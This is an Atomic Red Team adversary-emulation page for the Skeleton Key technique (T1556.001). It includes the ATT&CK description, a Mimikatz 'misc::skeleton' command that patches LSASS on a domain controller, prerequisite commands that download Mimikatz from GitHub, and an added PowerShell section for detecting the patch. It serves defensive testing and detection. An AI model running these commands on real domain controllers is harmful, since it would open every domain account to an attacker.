T1556.001
Modify Authentication Process: Domain Controller Authentication
Description from ATT&CK
Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.
Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: Skeleton Key). Skeleton Key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)
Atomic Tests
Atomic Test #1: Skeleton Key via Mimikatz
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC. Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
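The following PowerShell is an added example for operators running this test; it is not part of the Atomic Red Team test or of Mimikatz. It gives two checks to run against the isolated lab DC once after `misc::skeleton` and again after the cleanup reboot: a Kerberos (Negotiate) LDAP bind with the master password for a set of canary accounts whose real passwords are something else, which should succeed only while the patch is live in LSASS, and a scan of the DC's 4768 (TGT requested) events for RC4-HMAC tickets (encryption type 0x17), since Skeleton Key relies on RC4. The DC name `dc01.lab.local`, the canary account names, and the `-Since` window are placeholders, and the script assumes rights to read the DC's Security log remotely.

```powershell
# Added example, not from the Atomic Red Team page or from Mimikatz.
# Assumed placeholders: dc01.lab.local and the LAB\canaryNN accounts.

function Test-SkeletonKeyPassword {
    # Returns one object per account: AcceptsMasterKey is $true when the DC
    # authenticated the account with the Skeleton Key master password.
    param(
        [Parameter(Mandatory)] [string]   $DomainController,
        [Parameter(Mandatory)] [string[]] $UserName,        # DOMAIN\name or UPN
        [string] $MasterPassword = 'mimikatz'               # Mimikatz default for misc::skeleton
    )
    foreach ($name in $UserName) {
        # AuthenticationTypes::Secure = SASL/Negotiate bind, i.e. Kerberos first.
        # That is the code path misc::skeleton patches; a simple bind would not
        # necessarily exercise it.
        $entry = New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList @(
            "LDAP://$DomainController", $name, $MasterPassword,
            [System.DirectoryServices.AuthenticationTypes]::Secure)
        try {
            $null = $entry.NativeObject   # forces the bind; throws on bad credentials
            $accepted = $true; $detail = $null
        } catch {
            $accepted = $false; $detail = $_.Exception.Message
        } finally {
            $entry.Dispose()
        }
        [pscustomobject]@{ Account = $name; AcceptsMasterKey = $accepted; Detail = $detail }
    }
}

function Get-Rc4TgtRequest {
    # Lists successful TGT requests (Event ID 4768, Status 0x0) on the KDC whose
    # TicketEncryptionType is 0x17 (RC4-HMAC). Fields are read by name from the
    # event XML rather than by positional index.
    param(
        [Parameter(Mandatory)] [string] $DomainController,
        [datetime] $Since = (Get-Date).AddHours(-1)
    )
    $filter = @{ LogName = 'Security'; Id = 4768; StartTime = $Since }
    Get-WinEvent -ComputerName $DomainController -FilterHashtable $filter -ErrorAction Stop |
        ForEach-Object {
            $field = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $field[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Account = $field['TargetUserName']
                Client  = $field['IpAddress']
                EType   = $field['TicketEncryptionType']
                Status  = $field['Status']
            }
        } |
        Where-Object { $_.EType -eq '0x17' -and $_.Status -eq '0x0' }
}

# Usage after the attack command, then again after Restart-Computer (placeholder names):
#   Test-SkeletonKeyPassword -DomainController dc01.lab.local -UserName 'LAB\canary01','LAB\canary02'
#   Get-Rc4TgtRequest -DomainController dc01.lab.local -Since (Get-Date).AddMinutes(-30)
```

Expect every canary to report `AcceptsMasterKey = True` while the key is in LSASS memory and `False` after the cleanup reboot; a canary whose real password happens to be the master password would mask the result, so give them unrelated passwords. RC4 TGTs also occur legitimately (accounts without AES keys, older clients), so treat the 4768 output as a hunting lead for accounts that normally receive AES tickets, not as proof on its own. Two caveats on the test itself: `misc::skeleton` needs a handle to LSASS obtained with SeDebugPrivilege, so a DC running LSASS as a protected process (RunAsPPL) refuses it rather than silently succeeding, and if Sysmon is deployed the direct signal is Event ID 10 with `lsass.exe` as the TargetImage and the mimikatz binary as the SourceImage.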
Supported Platforms: Windows
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| mimikatz_path | Path to the mimikatz executable | path | C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe |
| file_path | File path where the zipped mimikatz file is downloaded to | path | C:\ExternalPayloads\Mimikatz\mimikatz.zip |
| mimikatz_url | The URL for the mimikatz release zip | url | https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip |
| directory_path | Directory path for mimikatz | path | C:\ExternalPayloads\Mimikatz |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

```powershell
& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
```

Cleanup Commands

```powershell
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
```

Dependencies: Run with powershell!
Description: Mimikatz must be present on the host machine at
Check Prereq Commands

```powershell
if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
```

Get Prereq Commands

```powershell
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
```

Atomic test(s) for this technique last updated: 2026-04-16 03:09:01 UTC